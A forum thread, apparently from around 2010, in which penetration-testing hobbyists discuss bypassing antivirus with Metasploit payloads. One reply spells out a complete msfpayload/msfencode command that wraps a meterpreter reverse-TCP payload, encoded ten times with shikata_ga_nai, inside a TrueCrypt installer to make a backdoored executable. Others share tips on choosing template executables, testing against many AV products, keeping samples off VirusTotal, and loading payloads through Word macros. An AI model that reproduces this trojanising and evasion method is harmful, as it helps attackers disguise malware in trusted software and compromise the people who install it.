"how to bypass AVs, but i dont show you how", that's funny![]()
Hers a video of a demo I made in response to a post on another site stating that AVG picks up all the payloads. It doesnt!!!
Bypass AntiVirus
Please comment.
"how to bypass AVs, but i dont show you how", that's funny![]()
It was just to show how it can be done as there is a bit of confusion as to various payloads being picked up by certain AVs if it can be done so its not that hard to find out shikata etc but it matters what exe you use some have packers that prevent the encoding try and see what you come up with didnt want the sig all over virus total etc and as its a public vid didnt want misuse of it.
thanks for the reply tho.
The encoding scheme was "omitted".
I think that you used another exe to generate a payload and encoded it with shikata_ga_nai 10x.
The size of the payload is very large, 3.3 MB.
Am I wrong?
Regards
\o/
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=5555 R | msfencode -t exe -x /root/Truecrypt_70.exe -o /root/Truecrypt_70_backdoor.exe -e x86/shikata_ga_nai -c 10
(gdb) disass m(y_br)ain
Hehe!
It was never going to stay secret..
It's a shame you omitted the commands and didn't clarify (although it was obvious) which file was used for the template.
But I can understand your train of thought on why you did it.
Must admit that I was a little surprised to see that the AV bypass worked with only the shikata_ga_nai encoder; I had only tested smaller Windows executables and had to encode the hell out of them to bypass AV.
http://www.backtrack-linux.org/forum...r-payload.html
Hi fellas,
Thanks for taking the time to reply. Here's the thing: I posted other videos showing what I have learned and gave step by step instructions on everything I did and why, for those outside of the forums, the basic home user etc., to make them aware of these attacks and not just go out and buy a top name AV and think they have nothing more to worry about. I have had so many tops come to me with Trojans in bundled software from top names, and the machines are full of bad stuff.
Now I have had lots of views in the forum and no replies, so I thought I would do this video in the raw, so to speak (and look, I get replies). Also, as it was public on various vid sites, I did not want all and sundry making these payloads. This forum is a place for responsible security issues and findings, so I guess I was being responsible for the one part, and the guys on here who know their stuff and are trustworthy would get the gist of what was carried out in the exploit. I have learnt a lot on here, and "Tape", your blog has taught me a lot. Thanks.... Btw, I started the AV bypass using your tutorial and modified it from there, so a shout goes out to you my friend....
I have also made a video on Windows 7 and the Adobe CoolType, as it works and people reckon it doesn't.
The best way to try them out is to get all the major AV trials, install them on VMs using snapshots and try to evade from there. The main reasons I tried lots of different encoding options were:
1: My main machine has ESET installed, and that picks up practically everything others do not, so the main goal was to evade that.
2: The exes have different packing methods I think, and trial and error ends up with a good exe payload. AVG picks up bad file sigs on major exes (Adobe etc.), so I tried a not so common app; the Java installer works actually, and that surprised me, and so does the TrueCrypt app. Most payloads work with others, but in this instance AVG picks up a bad file sig as I said, and these apps don't trigger that, so they are 100% on all the majors.
Please note I'm no expert and don't claim to be, so all advice is most welcome.
Long post I know, but hey, you deserve an explanation just for replying.
espreto! You got most of it correct btw.
Cheers all, Pentest09
Well, looks like this demo ended up getting smashed all over VirusTotal. ESET picks up all of them now; I had this working undetected for nearly 8 months, and 2 weeks after this demo it ends up detected.. back to square one....
I have a reverse tcp meterpreter session exe made up that is still very much undetected.
In fact I have a few and all over 4 months old and still functioning.
They are all based on what I did in my blog... However, if I were to post the exact method I used.. you can bet your life it would be checked, tested and checked with VirusTotal and accordingly rendered useless..
A good lesson learned on your part, I would say.
Yeah, it's ok, I just got it past ESET once again, but I find if I use multi-encoding the exe doesn't execute correctly. Yeah, won't do that one again... Still having problems trying to inject a payload into macros in a .doc at the moment. Any ideas? I get errors: it opens the payload and places it in the target drive, but that's as far as it gets; it doesn't execute the payload. Followed step by step the Metasploit Unleashed version, but using 2007 not 2003, which slightly differs. Thanks for the reply.
edit: "but I find if I use multi-encoding the exe doesn't execute correctly": it's ok, got it working, and thanks to this problem, upon resolving it and trying to find a new way, I have in fact tried with 20 AVs in snapshots on VMware, with heuristics, and 100% undetected. So it's all cushteee!!!
Last edited by pentest09; 09-29-2010 at 11:48 AM.